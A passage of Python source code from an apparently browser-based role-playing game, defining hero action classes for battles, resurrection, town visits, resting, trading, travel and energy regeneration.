context=cls.CONTEXT_MANAGER(),\n mob=mob,\n mob_context=cls.CONTEXT_MANAGER(),\n percents=percents,\n state=state)\n\n if instant_kill_mob:\n prototype._kill_mob()\n\n return prototype\n\n def get_description_arguments(self):\n args = super(ActionBattlePvE1x1Prototype, self).get_description_arguments()\n args.update({'mob': self.mob})\n return args\n\n def bit_mob(self, percents):\n\n if self.state != self.STATE.BATTLE_RUNNING:\n return False\n\n self.mob.strike_by(percents)\n\n self.percents = 1.0 - self.mob.health_percents\n self.hero.actions.current_action.percents = self.percents\n\n if self.mob.health <= 0:\n self.on_mob_killed()\n\n self.updated = True\n\n return True\n\n def fast_resurrect(self):\n if self.state != self.STATE.PROCESSED: # hero can be dead only if action already processed\n return False\n\n if self.hero.is_alive:\n return False\n\n self.hero.resurrect()\n\n self.updated = True\n return True\n\n def _kill_mob(self, hero_alive=True):\n self.mob.kill()\n self.hero.statistics.change_pve_kills(1)\n\n if not hero_alive:\n return\n\n loot = artifacts_storage.generate_loot(self.hero, self.mob)\n\n if loot is not None:\n bag_uuid = self.hero.put_loot(loot)\n\n if bag_uuid is not None:\n if loot.is_useless:\n self.hero.statistics.change_loot_had(1)\n else:\n self.hero.statistics.change_artifacts_had(1)\n self.hero.add_message('action_battlepve1x1_put_loot', hero=self.hero, artifact=loot, mob=self.mob)\n else:\n self.hero.add_message('action_battlepve1x1_put_loot_no_space', hero=self.hero, artifact=loot, mob=self.mob)\n else:\n self.hero.add_message('action_battlepve1x1_no_loot', hero=self.hero, mob=self.mob)\n\n if self.hero.can_get_exp_for_kill():\n raw_experience = int(c.EXP_FOR_KILL*random.uniform(1.0-c.EXP_FOR_KILL_DELTA, 1.0+c.EXP_FOR_KILL_DELTA))\n real_experience = self.hero.add_experience(raw_experience)\n self.hero.add_message('action_battlepve1x1_exp_for_kill', hero=self.hero, mob=self.mob, diary=True, experience=real_experience)\n\n if (self.hero.companion and\n self.hero.companion.health < self.hero.companion.max_health and\n self.hero.can_companion_eat_corpses() and\n random.random() < 
self.hero.companion_eat_corpses_probability and\n                self.mob.mob_type.is_eatable):\n            health = self.hero.companion.heal(c.COMPANIONS_EATEN_CORPSES_HEAL_AMOUNT)\n            self.hero.add_message('companions_eat_corpse', companion_owner=self.hero, companion=self.hero.companion, health=health, mob=self.mob)\n\n\n    def process_artifact_breaking(self):\n\n        self.hero.damage_integrity()\n\n        if random.uniform(0.0, 1.0) > c.ARTIFACTS_BREAKS_PER_BATTLE:\n            return\n\n        artifacts = self.hero.artifacts_to_break()\n\n        if not len(artifacts):\n            return\n\n        artifact = utils_logic.random_value_by_priority([(artifact, 1 - artifact.integrity_fraction) for artifact in artifacts])\n\n        artifact.break_it()\n        self.hero.add_message('action_battlepve1x1_artifact_broken', hero=self.hero, mob=self.mob, diary=True, artifact=artifact)\n\n    def on_mob_killed(self):\n        self.hero.add_message('action_battlepve1x1_mob_killed', hero=self.hero, mob=self.mob)\n        self._kill_mob()\n        self.state = self.STATE.PROCESSED\n\n    def on_hero_killed(self):\n        self.hero.kill()\n        self.hero.statistics.change_pve_deaths(1)\n        self.hero.add_message('action_battlepve1x1_diary_hero_killed', diary=True, journal=False, hero=self.hero, mob=self.mob)\n        self.hero.add_message('action_battlepve1x1_journal_hero_killed', hero=self.hero, mob=self.mob)\n        self.state = self.STATE.PROCESSED\n\n    def on_both_killed(self):\n        self._kill_mob(hero_alive=False)\n        self.hero.kill()\n        self.hero.statistics.change_pve_deaths(1)\n        self.hero.add_message('action_battlepve1x1_diary_hero_and_mob_killed', diary=True, journal=False, hero=self.hero, mob=self.mob)\n        self.hero.add_message('action_battlepve1x1_journal_hero_and_mob_killed', hero=self.hero, mob=self.mob)\n        self.state = self.STATE.PROCESSED\n\n    def process(self):\n\n        if self.state == self.STATE.BATTLE_RUNNING:\n\n            # make a turn only if the mob is still alive (it can be killed by the angel)\n            if self.mob.health > 0:\n                battle.make_turn(battle.Actor(self.hero, self.context),\n                                 battle.Actor(self.mob, self.mob_context),\n                                 self.hero)\n                self.percents = 1.0 - self.mob.health_percents\n\n            if self.hero.health <= 0:\n                if self.mob.health <= 0:\n                    self.on_both_killed()\n                else:\n                    self.on_hero_killed()\n\n            elif self.mob.health <= 0:\n                self.on_mob_killed()\n\n        if self.state == self.STATE.PROCESSED:\n            self.process_artifact_breaking()\n\n\nclass ActionResurrectPrototype(ActionBase):\n\n    TYPE = relations.ACTION_TYPE.RESURRECT\n    TEXTGEN_TYPE = 'action_resurrect'\n    HELP_CHOICES = set((HELP_CHOICES.RESURRECT,))\n\n    class STATE(ActionBase.STATE):\n        RESURRECT = 'resurrect'\n\n    @classmethod\n    def _create(cls, hero, bundle_id):\n        hero.add_message('action_resurrect_start', hero=hero)\n\n        return cls( hero=hero,\n                    bundle_id=bundle_id,\n                    state=cls.STATE.RESURRECT)\n\n    def fast_resurrect(self):\n        if self.state != self.STATE.RESURRECT:\n            return False\n\n        self.hero.actions.current_action.percents = self.percents\n\n        self.hero.resurrect()\n        self.state = self.STATE.PROCESSED\n\n        self.updated = True\n        return True\n\n\n    def process(self):\n\n        if self.state == self.STATE.RESURRECT:\n\n            self.percents += 1.0 / self.hero.resurrect_length\n\n            if random.uniform(0, 1) < 1.0 / c.TURNS_TO_RESURRECT / 2: # one phrase per two hero levels\n                self.hero.add_message('action_resurrect_resurrecting', hero=self.hero)\n\n            if self.percents >= 1:\n                self.hero.resurrect()\n                self.state = self.STATE.PROCESSED\n                self.hero.add_message('action_resurrect_finish', hero=self.hero)\n\n\nclass ActionInPlacePrototype(ActionBase):\n\n    TYPE = relations.ACTION_TYPE.IN_PLACE\n    TEXTGEN_TYPE = 'action_inplace'\n    HELP_CHOICES = 
set((HELP_CHOICES.HEAL, HELP_CHOICES.MONEY, HELP_CHOICES.EXPERIENCE, HELP_CHOICES.STOCK_UP_ENERGY, HELP_CHOICES.HEAL_COMPANION))\n\n class STATE(ActionBase.STATE):\n SPEND_MONEY = 'spend_money'\n REGENERATE_ENERGY = 'regenerate_energy'\n CHOOSING = 'choosing'\n TRADING = 'trading'\n RESTING = 'resting'\n EQUIPPING = 'equipping'\n HEALING_COMPANION = 'healing_companion'\n\n ###########################################\n # Object operations\n ###########################################\n\n @classmethod\n def _create(cls, hero, bundle_id):\n prototype = cls( hero=hero,\n bundle_id=bundle_id,\n state=cls.STATE.SPEND_MONEY)\n\n if hero.position.place.modifier:\n if hero.health < hero.max_health and hero.position.place.modifier.full_regen_allowed():\n hero.health = hero.max_health\n hero.add_message('action_inplace_instant_heal', hero=hero, place=hero.position.place)\n\n if hero.companion and hero.companion.health < hero.companion.max_health and hero.position.place.modifier.companion_regen_allowed():\n healed_health = hero.companion.heal(c.COMPANIONS_HEAL_AMOUNT)\n hero.add_message('action_inplace_companion_heal', hero=hero, place=hero.position.place, companion=hero.companion, health=healed_health)\n\n if (hero.energy < hero.energy_maximum and\n hero.position.place.modifier and hero.position.place.modifier.energy_regen_allowed() and\n hero.position.place != hero.position.previous_place):\n hero.change_energy(c.ANGEL_ENERGY_INSTANT_REGENERATION_IN_PLACE)\n hero.add_message('action_inplace_instant_energy_regen', hero=hero, place=hero.position.place)\n\n if (hero.position.place.tax > 0 and\n hero.position.place != hero.position.previous_place):\n\n if hero.money > 0:\n tax = int(hero.money * hero.position.place.tax)\n hero.change_money(MONEY_SOURCE.SPEND_FOR_TAX, -tax)\n hero.add_message('action_inplace_tax', hero=hero, place=hero.position.place, coins=tax, diary=True)\n else:\n hero.add_message('action_inplace_tax_no_money', hero=hero, place=hero.position.place, diary=True)\n\n if ( hero.position.place.can_habit_event() and\n hero.position.place != hero.position.previous_place ):\n\n if random.uniform(0, 1) < 0.5:\n hero.add_message('action_inplace_habit_event_honor_%s' % hero.position.place.habit_honor.interval.name.lower(),\n hero=hero, place=hero.position.place, diary=True)\n else:\n hero.add_message('action_inplace_habit_event_peacefulness_%s' % hero.position.place.habit_peacefulness.interval.name.lower(),\n hero=hero, place=hero.position.place, diary=True)\n\n if hero.companion and hero.position.place != hero.position.previous_place and hero.position.previous_place is not None:\n\n if hero.can_companion_eat():\n waymark = waymarks_storage.look_for_road(point_from=hero.position.previous_place.id, point_to=hero.position.place)\n coins = min(hero.money, int(math.ceil(f.gold_in_path(hero.level, waymark.length) * hero.companion_money_for_food_multiplier)+1))\n\n if coins > 0:\n hero.change_money(MONEY_SOURCE.SPEND_FOR_COMPANIONS, -coins)\n hero.add_message('action_inplace_companion_money_for_food', hero=hero, place=hero.position.place, companion=hero.companion, coins=coins)\n\n if not hero.bag.is_empty and hero.can_companion_drink_artifact() and random.random() < hero.companion_drink_artifact_probability:\n artifact = random.choice(hero.bag.values())\n hero.pop_loot(artifact)\n hero.add_message('action_inplace_companion_drink_artifact', hero=hero, place=hero.position.place, artifact=artifact, companion=hero.companion)\n\n if random.random() < hero.companion_leave_in_place_probability:\n 
hero.add_message('action_inplace_companion_leave', diary=True, hero=hero, place=hero.position.place, companion=hero.companion)\n hero.remove_companion()\n\n\n hero.position.visit_current_place()\n\n return prototype\n\n def action_event_message_arguments(self):\n return {'place': self.hero.position.place}\n\n def get_description_arguments(self):\n args = super(ActionInPlacePrototype, self).get_description_arguments()\n args.update({'place': self.hero.position.place})\n return args\n\n def process(self):\n return self.process_settlement()\n\n def try_to_spend_money(self):\n gold_amount = self.hero.modify_buy_price(self.hero.spend_amount)\n if gold_amount <= self.hero.money:\n self.hero.change_money(self.hero.next_spending.money_source, -gold_amount)\n self.hero.switch_spending()\n return gold_amount\n\n return None\n\n def spend_money__instant_heal(self):\n if self.hero.health > self.hero.max_health * c.SPEND_MONEY_FOR_HEAL_HEALTH_FRACTION:\n return\n\n coins = self.try_to_spend_money()\n if coins is not None:\n self.hero.health = self.hero.max_health\n self.hero.add_message('action_inplace_diary_instant_heal_for_money', diary=True, hero=self.hero, coins=coins)\n\n def spend_money__buying_artifact(self):\n if self.hero.need_equipping:\n # delay money spending, because the hero can buy an artifact better than the equipped one but worse than one he already has in the bag\n return\n\n coins = self.try_to_spend_money()\n if coins is not None:\n\n artifact, unequipped, sell_price = self.hero.receive_artifact(equip=True,\n better=True,\n prefered_slot=True,\n prefered_item=True,\n archetype=True,\n power_bonus=self.hero.buy_artifact_power_bonus())\n\n if unequipped is not None:\n if artifact.id == unequipped.id:\n self.hero.add_message('action_inplace_diary_buying_artifact_and_change_equal_items', diary=True,\n hero=self.hero, artifact=artifact, coins=coins, sell_price=sell_price, coins_delta=coins-sell_price)\n else:\n self.hero.add_message('action_inplace_diary_buying_artifact_and_change', diary=True,\n hero=self.hero, artifact=artifact, coins=coins, old_artifact=unequipped, sell_price=sell_price)\n else:\n self.hero.add_message('action_inplace_diary_buying_artifact', diary=True, hero=self.hero, coins=coins, artifact=artifact)\n\n def spend_money__sharpening_artifact(self):\n coins = self.try_to_spend_money()\n if coins is not None:\n artifact = self.hero.sharp_artifact()\n\n self.hero.add_message('action_inplace_diary_sharpening_artifact', diary=True, hero=self.hero, coins=coins, artifact=artifact)\n\n def spend_money__repairing_artifact(self):\n coins = self.try_to_spend_money()\n if coins is not None:\n artifact = self.hero.repair_artifact()\n\n self.hero.add_message('action_inplace_diary_repairing_artifact', diary=True, hero=self.hero, coins=coins, artifact=artifact)\n\n def spend_money__useless(self):\n coins = self.try_to_spend_money()\n if coins is not None:\n self.hero.add_message('action_inplace_diary_spend_useless', diary=True, hero=self.hero, coins=coins)\n\n def spend_money__impact(self):\n coins = self.try_to_spend_money()\n if coins is not None:\n\n choices = []\n\n if self.hero.preferences.friend is not None and self.hero.preferences.friend.place.id == self.hero.position.place.id:\n choices.append((True, self.hero.preferences.friend))\n\n if self.hero.preferences.enemy is not None and self.hero.preferences.enemy.place.id == self.hero.position.place.id:\n choices.append((False, self.hero.preferences.enemy))\n\n if not choices:\n choices.append((random.choice([True, False]), 
random.choice(self.hero.position.place.persons)))\n\n impact_type, person = random.choice(choices)\n\n if impact_type:\n power_direction = 1\n self.hero.add_message('action_inplace_diary_impact_good', diary=True, hero=self.hero, coins=coins, person=person)\n else:\n power_direction = -1\n self.hero.add_message('action_inplace_diary_impact_bad', diary=True, hero=self.hero, coins=coins, person=person)\n\n if not self.hero.can_change_person_power(person):\n return\n\n power, positive_bonus, negative_bonus = self.hero.modify_politics_power(power_direction*f.person_power_for_quest(c.QUEST_AREA_RADIUS), person=person)\n person.cmd_change_power(power, positive_bonus, negative_bonus)\n\n def spend_money__experience(self):\n coins = self.try_to_spend_money()\n\n if coins is not None:\n experience = int(c.BASE_EXPERIENCE_FOR_MONEY_SPEND * (1.0 + random.uniform(-c.EXPERIENCE_DELTA_FOR_MONEY_SPEND, c.EXPERIENCE_DELTA_FOR_MONEY_SPEND)) + 1)\n self.hero.add_experience(experience)\n self.hero.add_message('action_inplace_diary_experience', diary=True, hero=self.hero, coins=coins, experience=experience)\n\n\n def spend_money__heal_companion(self):\n if self.hero.companion is None:\n return\n\n if self.hero.companion.health == self.hero.companion.max_health:\n return\n\n coins = self.try_to_spend_money()\n if coins is not None:\n health = self.hero.companion.heal(c.COMPANIONS_REGEN_BY_MONEY_SPEND)\n self.hero.add_message('action_inplace_diary_heal_companion_healed',\n diary=True, place=self.hero.position.place, hero=self.hero, coins=coins, companion=self.hero.companion, health=health)\n\n def spend_money(self):\n\n if self.hero.next_spending.is_INSTANT_HEAL:\n self.spend_money__instant_heal()\n\n elif self.hero.next_spending.is_BUYING_ARTIFACT:\n self.spend_money__buying_artifact()\n elif self.hero.next_spending.is_SHARPENING_ARTIFACT:\n self.spend_money__sharpening_artifact()\n\n elif self.hero.next_spending.is_REPAIRING_ARTIFACT:\n self.spend_money__repairing_artifact()\n\n elif self.hero.next_spending.is_USELESS:\n self.spend_money__useless()\n\n elif self.hero.next_spending.is_IMPACT:\n self.spend_money__impact()\n\n elif self.hero.next_spending.is_EXPERIENCE:\n self.spend_money__experience()\n\n elif self.hero.next_spending.is_HEAL_COMPANION:\n self.spend_money__heal_companion()\n\n else:\n raise exceptions.ActionException('wrong hero money spend type: %d' % self.hero.next_spending)\n\n\n def process_companion_stealing(self):\n\n if self.hero.companion is None:\n return\n\n if self.hero.can_companion_steal_money():\n money = int(f.normal_loot_cost_at_lvl(self.hero.level) * random.uniform(0.8, 1.2) * self.hero.companion_steal_money_modifier) + 1\n self.hero.change_money(MONEY_SOURCE.EARNED_FROM_COMPANIONS, money)\n self.hero.add_message('action_inplace_companion_steal_money', hero=self.hero, place=self.hero.position.place, companion=self.hero.companion, coins=money)\n\n if self.hero.can_companion_steal_item() and not self.hero.bag_is_full:\n loot = artifacts_storage.generate_any_artifact(self.hero, artifact_probability_multiplier=self.hero.companion_steal_artifact_probability_multiplier)\n\n self.hero.put_loot(loot)\n\n if loot.is_useless:\n self.hero.statistics.change_loot_had(1)\n else:\n self.hero.statistics.change_artifacts_had(1)\n\n self.hero.add_message('action_inplace_companion_steal_item', hero=self.hero, place=self.hero.position.place, artifact=loot, companion=self.hero.companion)\n\n\n def process_settlement(self):\n\n if self.state == self.STATE.SPEND_MONEY:\n self.state = 
self.STATE.CHOOSING\n self.spend_money()\n\n if self.state in [self.STATE.RESTING, self.STATE.HEALING_COMPANION, self.STATE.EQUIPPING, self.STATE.TRADING, self.STATE.REGENERATE_ENERGY]:\n self.state = self.STATE.CHOOSING\n\n if self.state == self.STATE.CHOOSING:\n\n if random.uniform(0, 1) < c.HABIT_IN_PLACE_EVENTS_IN_TURN:\n self.do_events()\n\n if self.hero.need_regenerate_energy and self.hero.preferences.energy_regeneration_type != e.ANGEL_ENERGY_REGENERATION_TYPES.SACRIFICE:\n self.state = self.STATE.REGENERATE_ENERGY\n ActionRegenerateEnergyPrototype.create(hero=self.hero)\n\n elif self.hero.need_rest_in_settlement:\n self.state = self.STATE.RESTING\n ActionRestPrototype.create(hero=self.hero)\n\n elif self.hero.companion_need_heal():\n self.state = self.STATE.HEALING_COMPANION\n ActionHealCompanionPrototype.create(hero=self.hero)\n\n elif self.hero.need_equipping:\n self.state = self.STATE.EQUIPPING\n ActionEquippingPrototype.create(hero=self.hero)\n\n elif self.hero.need_trade_in_town:\n self.state = self.STATE.TRADING\n ActionTradingPrototype.create(hero=self.hero)\n\n else:\n self.state = self.STATE.PROCESSED\n\n if self.state == self.STATE.PROCESSED:\n self.process_companion_stealing()\n\n\nclass ActionRestPrototype(ActionBase):\n\n TYPE = relations.ACTION_TYPE.REST\n TEXTGEN_TYPE = 'action_rest'\n HELP_CHOICES = set((HELP_CHOICES.HEAL, HELP_CHOICES.MONEY, HELP_CHOICES.EXPERIENCE, HELP_CHOICES.STOCK_UP_ENERGY, HELP_CHOICES.HEAL_COMPANION))\n\n class STATE(ActionBase.STATE):\n RESTING = 'resting'\n\n ###########################################\n # Object operations\n ###########################################\n\n @classmethod\n def _create(cls, hero, bundle_id):\n prototype = cls( hero=hero,\n bundle_id=bundle_id,\n state=cls.STATE.RESTING)\n hero.add_message('action_rest_start', hero=hero)\n return prototype\n\n def on_heal(self):\n self.percents = float(self.hero.health)/self.hero.max_health\n self.hero.actions.current_action.percents = self.percents\n\n if self.hero.health >= self.hero.max_health:\n self.state = self.STATE.PROCESSED\n\n def process(self):\n\n if self.hero.health >= self.hero.max_health:\n self.state = self.STATE.PROCESSED\n\n if self.state == self.STATE.RESTING:\n\n heal_amount = int(round(float(self.hero.max_health) / self.hero.rest_length * (1 + random.uniform(-c.HEAL_STEP_FRACTION, c.HEAL_STEP_FRACTION))))\n\n heal_amount = self.hero.heal(heal_amount)\n\n if random.uniform(0, 1) < 0.2:\n self.hero.add_message('action_rest_resring', hero=self.hero, health=heal_amount)\n\n self.percents = float(self.hero.health)/self.hero.max_health\n\n if self.hero.health >= self.hero.max_health:\n self.state = self.STATE.PROCESSED\n\n if self.state == self.STATE.PROCESSED:\n self.hero.health = self.hero.max_health\n\n\n\n\nclass ActionEquippingPrototype(ActionBase):\n\n TYPE = relations.ACTION_TYPE.EQUIPPING\n TEXTGEN_TYPE = 'action_equipping'\n HELP_CHOICES = set((HELP_CHOICES.HEAL, HELP_CHOICES.MONEY, HELP_CHOICES.EXPERIENCE, HELP_CHOICES.STOCK_UP_ENERGY, HELP_CHOICES.HEAL_COMPANION))\n\n class STATE(ActionBase.STATE):\n EQUIPPING = 'equipping'\n\n ###########################################\n # Object operations\n ###########################################\n\n @classmethod\n def _create(cls, hero, bundle_id):\n return cls( hero=hero,\n bundle_id=bundle_id,\n state=cls.STATE.EQUIPPING)\n\n def process(self):\n\n if self.state == self.STATE.EQUIPPING:\n # TODO: calculate real percents\n self.percents = min(self.percents+0.25, 1)\n\n slot, unequipped, equipped = 
self.hero.equip_from_bag()\n\n if equipped:\n if unequipped:\n if equipped.id == unequipped.id:\n self.hero.add_message('action_equipping_diary_change_equal_items', diary=True, hero=self.hero, item=equipped)\n else:\n self.hero.add_message('action_equipping_diary_change_item', diary=True, hero=self.hero, unequipped=unequipped, equipped=equipped)\n else:\n self.hero.add_message('action_equipping_diary_equip_item', diary=True, hero=self.hero, equipped=equipped)\n else:\n self.state = self.STATE.PROCESSED\n\n\nclass ActionTradingPrototype(ActionBase):\n\n TYPE = relations.ACTION_TYPE.TRADING\n TEXTGEN_TYPE = 'action_trading'\n HELP_CHOICES = set((HELP_CHOICES.HEAL, HELP_CHOICES.MONEY, HELP_CHOICES.EXPERIENCE, HELP_CHOICES.STOCK_UP_ENERGY, HELP_CHOICES.HEAL_COMPANION))\n\n class STATE(ActionBase.STATE):\n TRADING = 'trading'\n\n ###########################################\n # Object operations\n ###########################################\n\n @classmethod\n def _create(cls, hero, bundle_id):\n prototype = cls( hero=hero,\n bundle_id=bundle_id,\n percents_barier=hero.bag.occupation,\n state=cls.STATE.TRADING)\n hero.add_message('action_trading_start', hero=hero)\n return prototype\n\n def process(self):\n\n if self.state == self.STATE.TRADING:\n\n if not self.hero.bag.is_empty:\n artifact = random.choice(self.hero.bag.values())\n sell_price = self.hero.sell_artifact(artifact)\n self.hero.add_message('action_trading_sell_item', hero=self.hero, artifact=artifact, coins=sell_price)\n\n loot_items_count = self.hero.bag.occupation # pylint: disable=W0612\n\n if loot_items_count:\n self.percents = 1 - float(loot_items_count - 1) / self.percents_barier\n else:\n self.state = self.STATE.PROCESSED\n\n\nclass ActionMoveNearPlacePrototype(ActionBase):\n\n TYPE = relations.ACTION_TYPE.MOVE_NEAR_PLACE\n TEXTGEN_TYPE = 'action_movenearplace'\n HELP_CHOICES = set((HELP_CHOICES.HEAL, HELP_CHOICES.MONEY, HELP_CHOICES.EXPERIENCE, HELP_CHOICES.STOCK_UP_ENERGY, HELP_CHOICES.HEAL_COMPANION))\n\n class STATE(ActionBase.STATE):\n MOVING = 'MOVING'\n BATTLE = 'BATTLE'\n REGENERATE_ENERGY = 'REGENERATE_ENERGY'\n RESTING = 'RESTING'\n RESURRECT = 'RESURRECT'\n IN_CITY = 'IN_CITY'\n HEALING_COMPANION = 'healing_companion'\n\n ###########################################\n # Object operations\n ###########################################\n\n @classmethod\n def _get_destination_coordinates(cls, back, place, terrains):\n if back:\n return place.x, place.y\n else:\n choices = ()\n\n if terrains is not None:\n map_info = map_info_storage.item\n choices = [ (x, y) for x, y in place.nearest_cells if map_info.terrain[y][x] in terrains]\n\n if not choices:\n choices = place.nearest_cells\n\n return random.choice(choices)\n\n @classmethod\n def _create(cls, hero, bundle_id, place, back, terrains=None):\n\n x, y = cls._get_destination_coordinates(back=back, place=place, terrains=terrains)\n\n prototype = cls( hero=hero,\n bundle_id=bundle_id,\n place_id=place.id,\n destination_x=x,\n destination_y=y,\n state=cls.STATE.MOVING,\n back=back)\n\n from_x, from_y = hero.position.cell_coordinates\n\n hero.position.set_coordinates(from_x, from_y, x, y, percents=0)\n\n return prototype\n\n def get_description_arguments(self):\n args = super(ActionMoveNearPlacePrototype, self).get_description_arguments()\n args.update({'place': self.place})\n return args\n\n\n def preprocess(self):\n\n if self.replane_required:\n self.state = self.STATE.PROCESSED\n return True\n\n if not self.hero.is_alive:\n ActionResurrectPrototype.create(hero=self.hero)\n 
self.state = self.STATE.RESURRECT\n return True\n\n if self.hero.need_rest_in_move:\n ActionRestPrototype.create(hero=self.hero)\n self.state = self.STATE.RESTING\n return True\n\n if self.hero.companion_need_heal():\n ActionHealCompanionPrototype.create(hero=self.hero)\n self.state = self.STATE.HEALING_COMPANION\n return True\n\n return False\n\n def process_battle(self):\n\n if self.hero.need_regenerate_energy:\n ActionRegenerateEnergyPrototype.create(hero=self.hero)\n self.state = self.STATE.REGENERATE_ENERGY\n return\n\n if self.hero.need_rest_in_move:\n ActionRestPrototype.create(hero=self.hero)\n self.state = self.STATE.RESTING\n return\n\n self.state = self.STATE.MOVING\n\n\n def process_moving(self):\n\n\n if self.hero.need_regenerate_energy and self.hero.preferences.energy_regeneration_type != e.ANGEL_ENERGY_REGENERATION_TYPES.SACRIFICE:\n ActionRegenerateEnergyPrototype.create(hero=self.hero)\n self.state = self.STATE.REGENERATE_ENERGY\n\n elif self.hero.position.is_battle_start_needed():\n mob = mobs_storage.create_mob_for_hero(self.hero)\n ActionBattlePvE1x1Prototype.create(hero=self.hero, mob=mob)\n self.state = self.STATE.BATTLE\n\n else:\n\n if self.hero.companion and self.hero.can_companion_say_wisdom() and random.random() < c.COMPANIONS_EXP_PER_MOVE_PROBABILITY:\n self.hero.add_experience(c.COMPANIONS_EXP_PER_MOVE_GET_EXP, without_modifications=True)\n self.hero.add_message('companions_say_wisdom', companion_owner=self.hero, companion=self.hero.companion, experience=c.COMPANIONS_EXP_PER_MOVE_GET_EXP)\n\n elif random.uniform(0, 1) < 0.25:\n self.hero.add_message('action_movenearplace_walk', hero=self.hero, place=self.place)\n\n\n if self.hero.position.subroad_len() == 0:\n self.hero.position.percents += 0.1\n else:\n move_speed = self.hero.position.modify_move_speed(self.hero.move_speed)\n delta = move_speed / self.hero.position.subroad_len()\n self.hero.position.percents += delta\n\n self.percents = self.hero.position.percents\n\n if self.hero.position.percents >= 1:\n\n to_x, to_y = self.hero.position.coordinates_to\n\n if self.back and not (self.place.x == to_x and self.place.y == to_y):\n # if place was moved\n from_x, from_y = self.hero.position.coordinates_to\n self.hero.position.set_coordinates(from_x, from_y, self.place.x, self.place.y, percents=0)\n return\n\n self.hero.position.percents = 1\n self.percents = 1\n\n if self.place.x == to_x and self.place.y == to_y:\n self.hero.position.set_place(self.place)\n ActionInPlacePrototype.create(hero=self.hero)\n self.state = self.STATE.IN_CITY\n\n else:\n self.state = self.STATE.PROCESSED\n\n\n def process(self):\n\n if self.preprocess():\n return\n\n if self.state == self.STATE.RESTING:\n self.state = self.STATE.MOVING\n\n if self.state == self.STATE.RESURRECT:\n self.state = self.STATE.MOVING\n\n if self.state == self.STATE.REGENERATE_ENERGY:\n self.state = self.STATE.MOVING\n\n if self.state == self.STATE.HEALING_COMPANION:\n self.state = self.STATE.MOVING\n\n if self.state == self.STATE.IN_CITY:\n if self.percents >= 1:\n self.state = self.STATE.PROCESSED\n else:\n self.state = self.STATE.MOVING\n\n if self.state == self.STATE.BATTLE:\n self.process_battle()\n\n if self.state == self.STATE.MOVING:\n self.process_moving()\n\n\nclass ActionRegenerateEnergyPrototype(ActionBase):\n\n TYPE = relations.ACTION_TYPE.REGENERATE_ENERGY\n TEXTGEN_TYPE = 'action_regenerate_energy'\n HELP_CHOICES = set((HELP_CHOICES.HEAL, HELP_CHOICES.MONEY, HELP_CHOICES.EXPERIENCE, HELP_CHOICES.STOCK_UP_ENERGY, HELP_CHOICES.HEAL_COMPANION))\n\n 
class STATE(ActionBase.STATE):\n REGENERATE = 'REGENERATE'\n\n ###########################################\n # Object operations\n ###########################################\n\n @classmethod\n def _create(cls, hero, bundle_id):\n prototype = cls( hero=hero,\n bundle_id=bundle_id,\n state=cls.STATE.REGENERATE)\n\n hero.add_message('action_regenerate_energy_start_%s' % cls.regeneration_slug(hero.preferences.energy_regeneration_type), hero=hero)\n\n return prototype\n\n @property\n def description_text_name(self):\n return '%s_description_%s' % (self.TEXTGEN_TYPE, self.regeneration_slug(self.regeneration_type))\n\n\n @property\n def regeneration_type(self):\n return self.hero.preferences.energy_regeneration_type\n\n @classmethod\n def regeneration_slug(cls, regeneration_type):\n return { e.ANGEL_ENERGY_REGENERATION_TYPES.PRAY: 'pray',\n e.ANGEL_ENERGY_REGENERATION_TYPES.SACRIFICE: 'sacrifice',\n e.ANGEL_ENERGY_REGENERATION_TYPES.INCENSE: 'incense',\n e.ANGEL_ENERGY_REGENERATION_TYPES.SYMBOLS: 'symbols',\n e.ANGEL_ENERGY_REGENERATION_TYPES.MEDITATION: 'meditation' }[regeneration_type]\n\n def step_percents(self):\n return 1.0 / c.ANGEL_ENERGY_REGENERATION_STEPS[self.regeneration_type]\n\n def process(self):\n\n if self.state == self.STATE.REGENERATE:\n\n self.percents += self.step_percents()\n\n if self.percents >= 1:\n multiplier = 2 if self.hero.can_regenerate_double_energy else 1\n energy_delta = self.hero.change_energy(f.angel_energy_regeneration_amount(self.regeneration_type)*multiplier)\n self.hero.last_energy_regeneration_at_turn = TimePrototype.get_current_turn_number()\n\n if energy_delta:\n self.hero.add_message('action_regenerate_energy_energy_received_%s' % self.regeneration_slug(self.regeneration_type), hero=self.hero, energy=energy_delta)\n else:\n self.hero.add_message('action_regenerate_energy_no_energy_received_%s' % self.regeneration_slug(self.regeneration_type), hero=self.hero)\n\n self.state = self.STATE.PROCESSED\n\n\nclass ActionDoNothingPrototype(ActionBase):\n\n TYPE = relations.ACTION_TYPE.DO_NOTHING\n TEXTGEN_TYPE = 'no texgen type'\n HELP_CHOICES = set((HELP_CHOICES.HEAL, HELP_CHOICES.MONEY, HELP_CHOICES.EXPERIENCE, HELP_CHOICES.STOCK_UP_ENERGY, HELP_CHOICES.HEAL_COMPANION))\n\n class STATE(ActionBase.STATE):\n DO_NOTHING = 'DO_NOTHING'\n\n @property\n def description_text_name(self):\n return '%s_description' % self.textgen_id\n\n ###########################################\n # Object operations\n ###########################################\n\n @classmethod\n def _create(cls, hero, bundle_id, duration, messages_prefix, messages_probability):\n prototype = cls( hero=hero,\n bundle_id=bundle_id,\n percents_barier=duration,\n extra_probability=messages_probability,\n textgen_id=messages_prefix,\n state=cls.STATE.DO_NOTHING)\n hero.add_message('%s_start' % messages_prefix, hero=hero)\n return prototype\n\n def process(self):\n\n if self.state == self.STATE.DO_NOTHING:\n\n self.percents += 1.0001 / self.percents_barier\n\n if self.extra_probability is not None and random.uniform(0, 1) < self.extra_probability:\n self.hero.add_message('%s_donothing' % self.textgen_id, hero=self.hero)\n\n if self.percents >= 1.0:\n self.state = self.STATE.PROCESSED\n\n\nclass ActionMetaProxyPrototype(ActionBase):\n\n SINGLE = False\n TYPE = relations.ACTION_TYPE.META_PROXY\n TEXTGEN_TYPE = 'no texgen type'\n HELP_CHOICES = set((HELP_CHOICES.HEAL, HELP_CHOICES.MONEY, HELP_CHOICES.EXPERIENCE, HELP_CHOICES.STOCK_UP_ENERGY, HELP_CHOICES.HEAL_COMPANION))\n APPROVED_FOR_STEPS_CHAIN = False\n\n 
